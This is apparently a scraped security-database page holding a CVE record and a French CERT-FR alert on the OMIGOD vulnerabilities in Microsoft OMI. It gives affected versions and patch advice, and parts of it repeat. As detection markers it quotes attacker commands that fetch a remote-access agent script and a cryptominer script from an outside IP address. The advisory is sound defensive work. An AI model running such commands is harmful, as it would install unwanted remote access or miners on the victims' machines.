\"affected\", \"version\": \"1.0.0\", \"lessThan\": \"OMS Agent for Linux GA v1.13.40-0\", \"versionType\": \"custom\"}], \"platforms\": [\"Unknown\"]}, {\"cpes\": [\"cpe:2.3:a:microsoft:log_analytics_agent:-:*:*:*:*:*:*:*\"], \"vendor\": \"Microsoft\", \"product\": \"Log Analytics Agent\", \"versions\": [{\"status\": \"affected\", \"version\": \"1.0.0\", \"lessThan\": \"OMS Agent for Linux GA v1.13.40-0\", \"versionType\": \"custom\"}], \"platforms\": [\"Unknown\"]}, {\"cpes\": [\"cpe:2.3:a:microsoft:azure_diagnostics:*:*:*:*:*:*:*:*\"], \"vendor\": \"Microsoft\", \"product\": \"Azure Diagnostics (LAD)\", \"versions\": [{\"status\": \"affected\", \"version\": \"3.0.0\", \"lessThan\": \"LAD v4.0.13 and LAD v3.0.135\", \"versionType\": \"custom\"}], \"platforms\": [\"Unknown\"]}, {\"cpes\": [\"cpe:2.3:a:microsoft:container_monitoring_solution:-:*:*:*:*:*:*:*\"], \"vendor\": \"Microsoft\", \"product\": \"Container Monitoring Solution\", \"versions\": [{\"status\": \"affected\", \"version\": \"1.0.0\", \"lessThan\": \"publication\", \"versionType\": \"custom\"}], \"platforms\": [\"Unknown\"]}, {\"cpes\": [\"cpe:2.3:a:microsoft:azure_security_center:*:*:*:*:*:*:*:*\"], \"vendor\": \"Microsoft\", \"product\": \"Azure Security Center\", \"versions\": [{\"status\": \"affected\", \"version\": \"1.0.0\", \"lessThan\": \"OMS Agent for Linux GA v1.13.40-0\", \"versionType\": \"custom\"}], \"platforms\": [\"Unknown\"]}, {\"cpes\": [\"cpe:2.3:a:microsoft:azure_sentinel:*:*:*:*:*:*:*:*\"], \"vendor\": \"Microsoft\", \"product\": \"Azure Sentinel\", \"versions\": [{\"status\": \"affected\", \"version\": \"1.0.0\", \"lessThan\": \"OMS Agent for Linux GA v1.13.40-0\", \"versionType\": \"custom\"}], \"platforms\": [\"Unknown\"]}, {\"cpes\": [\"cpe:2.3:a:microsoft:azure_stack_hub:*:*:*:*:*:*:*:*\"], \"vendor\": \"Microsoft\", \"product\": \"Azure Stack Hub\", \"versions\": [{\"status\": \"affected\", \"version\": \"1.0.0\", \"lessThan\": \"Monitor, Update and Config Mgmnt 1.14.01\", \"versionType\": \"custom\"}, {\"status\": \"affected\", \"version\": \"1.0.0\", \"lessThan\": \"3.1.135\", \"versionType\": \"custom\"}], \"platforms\": [\"Unknown\"]}], \"datePublic\": \"2021-09-14T07:00:00.000Z\", \"references\": [{\"url\": \"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-38647\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"http://packetstormsecurity.com/files/164694/Microsoft-OMI-Management-Interface-Authentication-Bypass.html\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en-US\", \"value\": \"Open Management Infrastructure Remote Code Execution Vulnerability\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en-US\", \"type\": \"Impact\", \"description\": \"Remote Code Execution\"}]}], \"providerMetadata\": {\"orgId\": \"f38d906d-7342-40ea-92c1-6c4a2c6478c8\", \"shortName\": \"microsoft\", \"dateUpdated\": \"2023-12-28T19:37:20.007Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2021-38647\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-10-21T23:25:33.144Z\", \"dateReserved\": \"2021-08-13T00:00:00.000Z\", \"assignerOrgId\": \"f38d906d-7342-40ea-92c1-6c4a2c6478c8\", \"datePublished\": \"2021-09-15T11:24:07.000Z\", \"assignerShortName\": \"microsoft\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}

CERTFR-2021-ALE-020

Vulnerability from certfr_alerte - Published: - Updated:

[Version du 20 septembre 2021]

Le 18 septembre Microsoft a publié un article afin d'expliquer comment Azure Sentinel peut aider à la recherche d'une compromission notamment l'exploitation des vulnérabilités OMIGOD [4]. De plus, à cette occasion, les marqueurs suivants, qui correspondent à des traces liées à une tentative d'exploitation, ont été proposés par Microsoft :

wget https://www[.]dwservice[.]net/download/dwagent_generic[.]sh -O dwagent_generic.sh
echo curl https://www[.]dwservice[.]net/download/dwagent_generic[.]sh --output dw.sh > go.sh
curl -fSsL http://104[.]168[.]213[.]31:55879/coinlinux/runMiner[.]sh

[Version initiale]

Le 14 septembre 2021, une équipe de chercheurs en vulnérabilités a découvert quatre vulnérabilités dans Microsoft Azure, la plateforme cloud de Microsoft [1]. Ces vulnérabilités sont situées au sein du service OMI, lequel est déployé dans l'écosystème Azure. Ces vulnérabilités ont été regroupées sous l’appellation de « OMIGOD ». Le service OMI est le pendant open-source pour la famille de systèmes d'exploitation de type Linux ou Unix de WMI (Windows Management Infrastructure) et permet la gestion des configurations dans des environnements distants et locaux.

En particulier, la vulnérabilité immatriculée CVE-2021-38647 permet à un attaquant non authentifié de réaliser une exécution de code arbitraire avec les privilèges de l'utilisateur root. Elle impacte uniquement les entités utilisant les solutions de gestion Linux (On-Premises SCOM, Azure Automation State Configuration ou Azure Desired State Configuration extension) lorsque la gestion à distance est activée.

Pour des besoins de gestion à distance, il est possible que les ports associés à OMI (5986 / 5985 / 1270) soient accessibles depuis Internet. Dans ce cas, la vulnérabilité peut être exploitée afin d'obtenir un accès initial à un environnement Azure pour ensuite pouvoir se déplacer latéralement au sein du système d'information, en tirant notamment parti des trois autres vulnérabilités, qui permettent une élévation de privilèges locale.

Dans le cadre de son Patch Tuesday, en date du 14 septembre 2021 [5], Microsoft a ainsi mis à disposition un correctif pour ces quatre vulnérabilités :

CVE-2021-38647 : Avec un score CVSSv3 à 9.8 et permettant à un attaquant de pouvoir exécuter du code arbitraire à distance ;
CVE-2021-38648 : Avec un score CVSSv3 à 7.8 et permettant à un attaquant de pouvoir réaliser une élévation de privilèges ;
CVE-2021-38645 : Avec un score CVSSv3 à 7.8 et permettant à un attaquant de pouvoir réaliser une élévation de privilèges ;
CVE-2021-38649 : Avec un score CVSSv3 à 7.0 et permettant à un attaquant de pouvoir réaliser une élévation de privilèges

Des codes d'exploitation sont publiquement disponibles sur Internet pour la CVE-2021-38647, ce qui signifie que l’exploitation de cette vulnérabilité est imminente ou déjà en cours.

Solution

Le CERT-FR recommande fortement la mise à jour des extensions vulnérables. Pour cela, dans le cadre d'un déploiement dans le Cloud, veuillez vous assurer que la mise à jour a bien été appliquée, sinon dans le cas contraire l'effectuer manuellement. En ce qui concerne les déploiements OnPremises, les mises à jour des extensions vulnérables doivent être réalisées manuellement. Afin d'identifier les extensions concernées par ces vulnérabilités, les utilisateurs peuvent utiliser Azure Portal ou Azure CLI comme décrit dans la documentation de Microsoft [3].

Le CERT-FR rappelle également que ce type de service ne doit pas être exposé sur Internet. De plus, il est fortement recommandé de filtrer l’accès des ports susmentionnés associés au service OMI uniquement aux machines d'administration autorisées.

Impacted products

Vendor	Product	Description
Microsoft	Azure	Azure Automation State Configuration, DSC Extension (Cloud) DSC Agent versions 3.0.0.1 antérieures à 3.0.0.3
Microsoft	Azure	Azure Automation State Configuration, DSC Extension (Cloud) DSC Agent versions 2.71.X.XX antérieures à 2.71.1.25
Microsoft	Azure	Azure Automation State Configuration, DSC Extension (Cloud) DSC Agent versions 2.0.0.0
Microsoft	Azure	System Center Operations Manager (SCOM) On-Premises OMI versions antérieures à v1.6.8-1 (OMI framework est utilisé pour la surveillance de Linux / Unix)
Microsoft	Azure	Container Monitoring Solution (Cloud) déployé avec une image docker ayant un SHA ID différent de 12b7682d8f9a2f67752bf121029e315abcae89bc0c34a0e05f07baec72280707
Microsoft	Azure	Azure Diagnostics (LAD) (Cloud) versions 3.0.131 et antérieures
Microsoft	Azure	Azure Automation State Configuration, DSC Extension (On-Premises) OMI versions antérieures à v1.6.8-1 (OMI framework est un pré-requis pour installer pour l'agent DSC )
Microsoft	Azure	Azure Automation State Configuration, DSC Extension (Cloud) DSC Agent versions 2.70.X.XX antérieures à 2.70.0.30
Microsoft	Azure	Azure Automation (On-Premises et Cloud) OMS Agent pour Linux GA versions v1.13.35 et antérieures
Microsoft	Azure	Azure Diagnostics (LAD) (Cloud) versions 4.0.0 à 4.0.5 antérieures à 4.0.11
Microsoft	Azure	Azure Security Center (Cloud) OMS Agent pour Linux GA versions v1.13.35 et antérieures
Microsoft	Azure	le paquet OMI (On-Premises et Cloud) versions antérieures à v1.6.8-1
Microsoft	Azure	Azure Automation Update Management (On-Premises et Cloud) OMS Agent pour Linux GA versions v1.13.35 et antérieures
Microsoft	Azure	Log Analytics Agent (On-Premises et Cloud) OMS Agent pour Linux GA versions 1.13.35 et antérieures

References

Title

Publication Time

Tags

Bulletin de sécurité Microsoft CVE-2021-38648	2021-09-16	vendor-advisory
Bulletin de sécurité Microsoft CVE-2021-38649	2021-09-16	vendor-advisory
Bulletin de sécurité Microsoft CVE-2021-38645	2021-09-16	vendor-advisory
Bulletin de sécurité Microsoft CVE-2021-38647	2021-09-16	vendor-advisory
[4] Aide pour l'utilisation de Azure Sentinel	-	other
[1] Publication de l'équipe de chercheurs en vulnérabilités de Wiz	-	other
[5] Avis CERT-FR du 15 septembre 2021	-	other
[3] Documentation de Microsoft	-	other
[2] Recommandations supplémentaires pour les vulnérabilités OMIGOD	-	other

Show details on source website

JSON

To clipboard

{
  "$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
  "affected_systems": [
    {
      "description": "Azure Automation State Configuration, DSC Extension (Cloud) DSC Agent versions 3.0.0.1 ant\u00e9rieures \u00e0 3.0.0.3",
      "product": {
        "name": "Azure",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Azure Automation State Configuration, DSC Extension (Cloud) DSC Agent versions 2.71.X.XX ant\u00e9rieures \u00e0 2.71.1.25",
      "product": {
        "name": "Azure",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Azure Automation State Configuration, DSC Extension (Cloud) DSC Agent versions 2.0.0.0",
      "product": {
        "name": "Azure",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "System Center Operations Manager (SCOM) On-Premises OMI versions ant\u00e9rieures \u00e0 v1.6.8-1 (OMI framework est utilis\u00e9 pour la surveillance de Linux / Unix)",
      "product": {
        "name": "Azure",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Container Monitoring Solution (Cloud) d\u00e9ploy\u00e9 avec une image docker ayant un SHA ID diff\u00e9rent de 12b7682d8f9a2f67752bf121029e315abcae89bc0c34a0e05f07baec72280707",
      "product": {
        "name": "Azure",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Azure Diagnostics (LAD) (Cloud) versions 3.0.131 et ant\u00e9rieures",
      "product": {
        "name": "Azure",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Azure Automation State Configuration, DSC Extension (On-Premises) OMI versions ant\u00e9rieures \u00e0 v1.6.8-1 (OMI framework est un pr\u00e9-requis pour installer pour l\u0027agent DSC )",
      "product": {
        "name": "Azure",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Azure Automation State Configuration, DSC Extension (Cloud) DSC Agent versions 2.70.X.XX ant\u00e9rieures \u00e0 2.70.0.30",
      "product": {
        "name": "Azure",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Azure Automation (On-Premises et Cloud) OMS Agent pour Linux GA versions v1.13.35 et ant\u00e9rieures",
      "product": {
        "name": "Azure",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Azure Diagnostics (LAD) (Cloud) versions 4.0.0 \u00e0 4.0.5 ant\u00e9rieures \u00e0 4.0.11",
      "product": {
        "name": "Azure",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Azure Security Center (Cloud) OMS Agent pour Linux GA versions v1.13.35 et ant\u00e9rieures",
      "product": {
        "name": "Azure",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "le paquet OMI (On-Premises et Cloud) versions ant\u00e9rieures \u00e0 v1.6.8-1",
      "product": {
        "name": "Azure",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Azure Automation Update Management (On-Premises et Cloud) OMS Agent pour Linux GA versions v1.13.35 et ant\u00e9rieures",
      "product": {
        "name": "Azure",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Log Analytics Agent (On-Premises et Cloud) OMS Agent pour Linux GA versions 1.13.35 et ant\u00e9rieures",
      "product": {
        "name": "Azure",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    }
  ],
  "affected_systems_content": "",
  "closed_at": "2022-01-05",
  "content": "## Solution\n\nLe CERT-FR recommande fortement la mise \u00e0 jour des extensions\nvuln\u00e9rables. Pour cela, dans le cadre d\u0027un d\u00e9ploiement dans le *Cloud*,\nveuillez vous assurer que la mise \u00e0 jour a bien \u00e9t\u00e9 appliqu\u00e9e, sinon\ndans le cas contraire l\u0027effectuer manuellement. En ce qui concerne les\nd\u00e9ploiements *OnPremises,* les mises \u00e0 jour des extensions vuln\u00e9rables\n\u003cu\u003edoivent \u00eatre r\u00e9alis\u00e9es manuellement\u003c/u\u003e. Afin d\u0027identifier les\nextensions concern\u00e9es par ces vuln\u00e9rabilit\u00e9s, les utilisateurs peuvent\nutiliser Azure Portal ou Azure CLI comme d\u00e9crit dans la documentation de\nMicrosoft \\[3\\].\n\n**Le CERT-FR rappelle \u00e9galement que ce type de service ne doit pas \u00eatre\nexpos\u00e9 sur Internet. De plus, il est fortement recommand\u00e9 de filtrer\nl\u2019acc\u00e8s des ports susmentionn\u00e9s associ\u00e9s au service OMI uniquement aux\nmachines d\u0027administration autoris\u00e9es.** \n",
  "cves": [
    {
      "name": "CVE-2021-38648",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-38648"
    },
    {
      "name": "CVE-2021-38647",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-38647"
    },
    {
      "name": "CVE-2021-38645",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-38645"
    },
    {
      "name": "CVE-2021-38649",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-38649"
    }
  ],
  "links": [
    {
      "title": "[4] Aide pour l\u0027utilisation de Azure Sentinel",
      "url": "https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093"
    },
    {
      "title": "[1] Publication de l\u0027\u00e9quipe de chercheurs en vuln\u00e9rabilit\u00e9s de Wiz",
      "url": "https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure"
    },
    {
      "title": "[5] Avis CERT-FR du 15 septembre 2021",
      "url": "https://www.cert.ssi.gouv.fr/avis/CERTFR-2021-AVI-711/"
    },
    {
      "title": "[3] Documentation de Microsoft",
      "url": "https://docs.microsoft.com/en-us/azure/virtual-machines/extensions/features-linux#discover-vm-extensions"
    },
    {
      "title": "[2] Recommandations suppl\u00e9mentaires pour les vuln\u00e9rabilit\u00e9s OMIGOD",
      "url": "https://msrc-blog.microsoft.com/2021/09/16/additional-guidance-regarding-omi-vulnerabilities-within-azure-vm-management-extensions/"
    }
  ],
  "reference": "CERTFR-2021-ALE-020",
  "revisions": [
    {
      "description": "Version initiale",
      "revision_date": "2021-09-17T00:00:00.000000"
    },
    {
      "description": "Ajout de la r\u00e9f\u00e9rence \u00e0 l\u0027avis CERT-FR",
      "revision_date": "2021-09-22T00:00:00.000000"
    },
    {
      "description": "Cl\u00f4ture de l\u0027alerte. Cela ne signifie pas la fin d\u0027une menace. Seule l\u0027application de la mise \u00e0 jour permet de vous pr\u00e9munir contre l\u0027exploitation de la vuln\u00e9rabilit\u00e9 correspondante.",
      "revision_date": "2022-01-05T00:00:00.000000"
    }
  ],
  "risks": [
    {
      "description": "\u00c9l\u00e9vation de privil\u00e8ges"
    },
    {
      "description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
    }
  ],
  "summary": "\u003cstrong\u003e\\[Version du 20 septembre 2021\\]\u003c/strong\u003e\n\n\u003cspan class=\"mx_MTextBody mx_EventTile_content\"\u003e\u003cspan\nclass=\"mx_EventTile_body\" dir=\"auto\"\u003eLe 18 septembre Microsoft a publi\u00e9\nun article afin d\u0027expliquer comment Azure Sentinel peut aider \u00e0 la\nrecherche d\u0027une compromission notamment l\u0027exploitation des\nvuln\u00e9rabilit\u00e9s OMIGOD \\[4\\]. De plus, \u00e0 cette occasion, les marqueurs\nsuivants, qui correspondent \u00e0 des traces li\u00e9es \u00e0 une tentative\nd\u0027exploitation, ont \u00e9t\u00e9 propos\u00e9s par Microsoft : \u003c/span\u003e\u003c/span\u003e\n\n-   \u003cspan class=\"mx_MTextBody mx_EventTile_content\"\u003e\u003cspan\n    class=\"mx_EventTile_body\" dir=\"auto\"\u003ewget\n    https://www\\[.\\]dwservice\\[.\\]net/download/dwagent_generic\\[.\\]sh\u00a0\n    -O dwagent_generic.sh\u003c/span\u003e\u003c/span\u003e\n-   \u003cspan class=\"mx_MTextBody mx_EventTile_content\"\u003e\u003cspan\n    class=\"mx_EventTile_body\" dir=\"auto\"\u003eecho curl\n    https://www\\[.\\]dwservice\\[.\\]net/download/dwagent_generic\\[.\\]sh\u00a0\n    --output dw.sh \\\u003e go.sh\u003c/span\u003e\u003c/span\u003e\n-   \u003cspan class=\"mx_MTextBody mx_EventTile_content\"\u003e\u003cspan\n    class=\"mx_EventTile_body\" dir=\"auto\"\u003ecurl -fSsL\n    http://104\\[.\\]168\\[.\\]213\\[.\\]31:55879/coinlinux/runMiner\\[.\\]sh\u003c/span\u003e\u003c/span\u003e\n\n\u003cstrong\u003e\\[Version initiale\\]\u003c/strong\u003e\n\nLe 14 septembre 2021, une \u00e9quipe de chercheurs en vuln\u00e9rabilit\u00e9s a\nd\u00e9couvert quatre vuln\u00e9rabilit\u00e9s dans Microsoft Azure, la plateforme\ncloud de Microsoft \\[1\\]. Ces vuln\u00e9rabilit\u00e9s sont situ\u00e9es au sein du\nservice OMI, lequel est d\u00e9ploy\u00e9 dans l\u0027\u00e9cosyst\u00e8me Azure. Ces\nvuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 regroup\u00e9es sous l\u2019appellation de \u00ab *OMIGOD* \u00bb. Le\nservice OMI est le pendant open-source pour la famille de syst\u00e8mes\nd\u0027exploitation de type Linux ou Unix de WMI (Windows Management\nInfrastructure) et permet la gestion des configurations dans des\nenvironnements distants et locaux.\n\n\u00a0\n\nEn particulier, la vuln\u00e9rabilit\u00e9 immatricul\u00e9e CVE-2021-38647 permet \u00e0 un\nattaquant non authentifi\u00e9 de r\u00e9aliser une ex\u00e9cution de code arbitraire\navec les privil\u00e8ges de l\u0027utilisateur *root*. Elle impacte uniquement les\nentit\u00e9s utilisant les solutions de gestion Linux (*On-Premises* SCOM,\nAzure Automation State Configuration ou Azure Desired State\nConfiguration extension) lorsque la gestion \u00e0 distance est activ\u00e9e.\n\n\u00a0\n\nPour des besoins de gestion \u00e0 distance, il est possible que les ports\nassoci\u00e9s \u00e0 OMI (5986 / 5985 / 1270) soient accessibles depuis Internet.\nDans ce cas, la vuln\u00e9rabilit\u00e9 peut \u00eatre exploit\u00e9e afin d\u0027obtenir un\nacc\u00e8s initial \u00e0 un environnement Azure pour ensuite pouvoir se d\u00e9placer\nlat\u00e9ralement au sein du syst\u00e8me d\u0027information, en tirant notamment parti\ndes trois autres vuln\u00e9rabilit\u00e9s, qui permettent une \u00e9l\u00e9vation de\nprivil\u00e8ges locale.\n\n\u00a0\n\nDans le cadre de son Patch Tuesday, en date du 14 septembre 2021 \\[5\\],\nMicrosoft a ainsi mis \u00e0 disposition un correctif pour ces quatre\nvuln\u00e9rabilit\u00e9s :\n\n-   CVE-2021-38647 : Avec un score CVSSv3 \u00e0 9.8 et permettant \u00e0 un\n    attaquant de pouvoir ex\u00e9cuter du code arbitraire \u00e0 distance ;\n-   CVE-2021-38648 : Avec un score CVSSv3 \u00e0 7.8 et permettant \u00e0 un\n    attaquant de pouvoir r\u00e9aliser une \u00e9l\u00e9vation de privil\u00e8ges ;\n-   CVE-2021-38645 :\u00a0Avec un score CVSSv3 \u00e0 7.8 et permettant \u00e0 un\n    attaquant de pouvoir r\u00e9aliser une \u00e9l\u00e9vation de privil\u00e8ges ;\n-   CVE-2021-38649 :\u00a0Avec un score CVSSv3 \u00e0 7.0 et permettant \u00e0 un\n    attaquant de pouvoir r\u00e9aliser une \u00e9l\u00e9vation de privil\u00e8ges\n\n\u003cdiv markdown=\"1\"\u003e\n\n\u00a0\n\n\u003cdiv markdown=\"1\"\u003e\n\n\u003cstrong\u003eDes codes d\u0027exploitation sont publiquement disponibles sur Internet\npour la CVE-2021-38647\u003c/strong\u003e, ce qui signifie que l\u2019exploitation de cette\nvuln\u00e9rabilit\u00e9 est imminente ou d\u00e9j\u00e0 en cours.\n\n\u003c/div\u003e\n\n\u003cdiv markdown=\"1\"\u003e\n\n\u003c/div\u003e\n\n\u003c/div\u003e\n",
  "title": "[Maj] Multiples vuln\u00e9rabilit\u00e9s dans Microsoft Azure Open Management Infrastructure",
  "vendor_advisories": [
    {
      "published_at": "2021-09-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2021-38648",
      "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38648"
    },
    {
      "published_at": "2021-09-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2021-38649",
      "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38649"
    },
    {
      "published_at": "2021-09-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2021-38645",
      "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38645"
    },
    {
      "published_at": "2021-09-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2021-38647",
      "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647"
    }
  ]
}

CERTFR-2021-ALE-020

Vulnerability from certfr_alerte - Published: - Updated:

[Version du 20 septembre 2021]

wget https://www[.]dwservice[.]net/download/dwagent_generic[.]sh -O dwagent_generic.sh
echo curl https://www[.]dwservice[.]net/download/dwagent_generic[.]sh --output dw.sh > go.sh
curl -fSsL http://104[.]168[.]213[.]31:55879/coinlinux/runMiner[.]sh

[Version initiale]

Dans le cadre de son Patch Tuesday, en date du 14 septembre 2021 [5], Microsoft a ainsi mis à disposition un correctif pour ces quatre vulnérabilités :

CVE-2021-38647 : Avec un score CVSSv3 à 9.8 et permettant à un attaquant de pouvoir exécuter du code arbitraire à distance ;
CVE-2021-38648 : Avec un score CVSSv3 à 7.8 et permettant à un attaquant de pouvoir réaliser une élévation de privilèges ;
CVE-2021-38645 : Avec un score CVSSv3 à 7.8 et permettant à un attaquant de pouvoir réaliser une élévation de privilèges ;
CVE-2021-38649 : Avec un score CVSSv3 à 7.0 et permettant à un attaquant de pouvoir réaliser une élévation de privilèges

Des codes d'exploitation sont publiquement disponibles sur Internet pour la CVE-2021-38647, ce qui signifie que l’exploitation de cette vulnérabilité est imminente ou déjà en cours.

Solution

Impacted products

Vendor	Product	Description
Microsoft	Azure	Azure Automation State Configuration, DSC Extension (Cloud) DSC Agent versions 3.0.0.1 antérieures à 3.0.0.3
Microsoft	Azure	Azure Automation State Configuration, DSC Extension (Cloud) DSC Agent versions 2.71.X.XX antérieures à 2.71.1.25
Microsoft	Azure	Azure Automation State Configuration, DSC Extension (Cloud) DSC Agent versions 2.0.0.0
Microsoft	Azure	System Center Operations Manager (SCOM) On-Premises OMI versions antérieures à v1.6.8-1 (OMI framework est utilisé pour la surveillance de Linux / Unix)
Microsoft	Azure	Container Monitoring Solution (Cloud) déployé avec une image docker ayant un SHA ID différent de 12b7682d8f9a2f67752bf121029e315abcae89bc0c34a0e05f07baec72280707
Microsoft	Azure	Azure Diagnostics (LAD) (Cloud) versions 3.0.131 et antérieures
Microsoft	Azure	Azure Automation State Configuration, DSC Extension (On-Premises) OMI versions antérieures à v1.6.8-1 (OMI framework est un pré-requis pour installer pour l'agent DSC )
Microsoft	Azure	Azure Automation State Configuration, DSC Extension (Cloud) DSC Agent versions 2.70.X.XX antérieures à 2.70.0.30
Microsoft	Azure	Azure Automation (On-Premises et Cloud) OMS Agent pour Linux GA versions v1.13.35 et antérieures
Microsoft	Azure	Azure Diagnostics (LAD) (Cloud) versions 4.0.0 à 4.0.5 antérieures à 4.0.11
Microsoft	Azure	Azure Security Center (Cloud) OMS Agent pour Linux GA versions v1.13.35 et antérieures
Microsoft	Azure	le paquet OMI (On-Premises et Cloud) versions antérieures à v1.6.8-1
Microsoft	Azure	Azure Automation Update Management (On-Premises et Cloud) OMS Agent pour Linux GA versions v1.13.35 et antérieures
Microsoft	Azure	Log Analytics Agent (On-Premises et Cloud) OMS Agent pour Linux GA versions 1.13.35 et antérieures

References

Title

Publication Time

Tags

Bulletin de sécurité Microsoft CVE-2021-38648	2021-09-16	vendor-advisory
Bulletin de sécurité Microsoft CVE-2021-38649	2021-09-16	vendor-advisory
Bulletin de sécurité Microsoft CVE-2021-38645	2021-09-16	vendor-advisory
Bulletin de sécurité Microsoft CVE-2021-38647	2021-09-16	vendor-advisory
[4] Aide pour l'utilisation de Azure Sentinel	-	other
[1] Publication de l'équipe de chercheurs en vulnérabilités de Wiz	-	other
[5] Avis CERT-FR du 15 septembre 2021	-	other
[3] Documentation de Microsoft	-	other
[2] Recommandations supplémentaires pour les vulnérabilités OMIGOD	-	other

Show details on source website

JSON

To clipboard

{
  "$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
  "affected_systems": [
    {
      "description": "Azure Automation State Configuration, DSC Extension (Cloud) DSC Agent versions 3.0.0.1 ant\u00e9rieures \u00e0 3.0.0.3",
      "product": {
        "name": "Azure",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Azure Automation State Configuration, DSC Extension (Cloud) DSC Agent versions 2.71.X.XX ant\u00e9rieures \u00e0 2.71.1.25",
      "product": {
        "name": "Azure",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Azure Automation State Configuration, DSC Extension (Cloud) DSC Agent versions 2.0.0.0",
      "product": {
        "name": "Azure",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "System Center Operations Manager (SCOM) On-Premises OMI versions ant\u00e9rieures \u00e0 v1.6.8-1 (OMI framework est utilis\u00e9 pour la surveillance de Linux / Unix)",
      "product": {
        "name": "Azure",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Container Monitoring Solution (Cloud) d\u00e9ploy\u00e9 avec une image docker ayant un SHA ID diff\u00e9rent de 12b7682d8f9a2f67752bf121029e315abcae89bc0c34a0e05f07baec72280707",
      "product": {
        "name": "Azure",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Azure Diagnostics (LAD) (Cloud) versions 3.0.131 et ant\u00e9rieures",
      "product": {
        "name": "Azure",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Azure Automation State Configuration, DSC Extension (On-Premises) OMI versions ant\u00e9rieures \u00e0 v1.6.8-1 (OMI framework est un pr\u00e9-requis pour installer pour l\u0027agent DSC )",
      "product": {
        "name": "Azure",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Azure Automation State Configuration, DSC Extension (Cloud) DSC Agent versions 2.70.X.XX ant\u00e9rieures \u00e0 2.70.0.30",
      "product": {
        "name": "Azure",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Azure Automation (On-Premises et Cloud) OMS Agent pour Linux GA versions v1.13.35 et ant\u00e9rieures",
      "product": {
        "name": "Azure",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Azure Diagnostics (LAD) (Cloud) versions 4.0.0 \u00e0 4.0.5 ant\u00e9rieures \u00e0 4.0.11",
      "product": {
        "name": "Azure",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Azure Security Center (Cloud) OMS Agent pour Linux GA versions v1.13.35 et ant\u00e9rieures",
      "product": {
        "name": "Azure",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "le paquet OMI (On-Premises et Cloud) versions ant\u00e9rieures \u00e0 v1.6.8-1",
      "product": {
        "name": "Azure",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Azure Automation Update Management (On-Premises et Cloud) OMS Agent pour Linux GA versions v1.13.35 et ant\u00e9rieures",
      "product": {
        "name": "Azure",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Log Analytics Agent (On-Premises et Cloud) OMS Agent pour Linux GA versions 1.13.35 et ant\u00e9rieures",
      "product": {
        "name": "Azure",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    }
  ],
  "affected_systems_content": "",
  "closed_at": "2022-01-05",
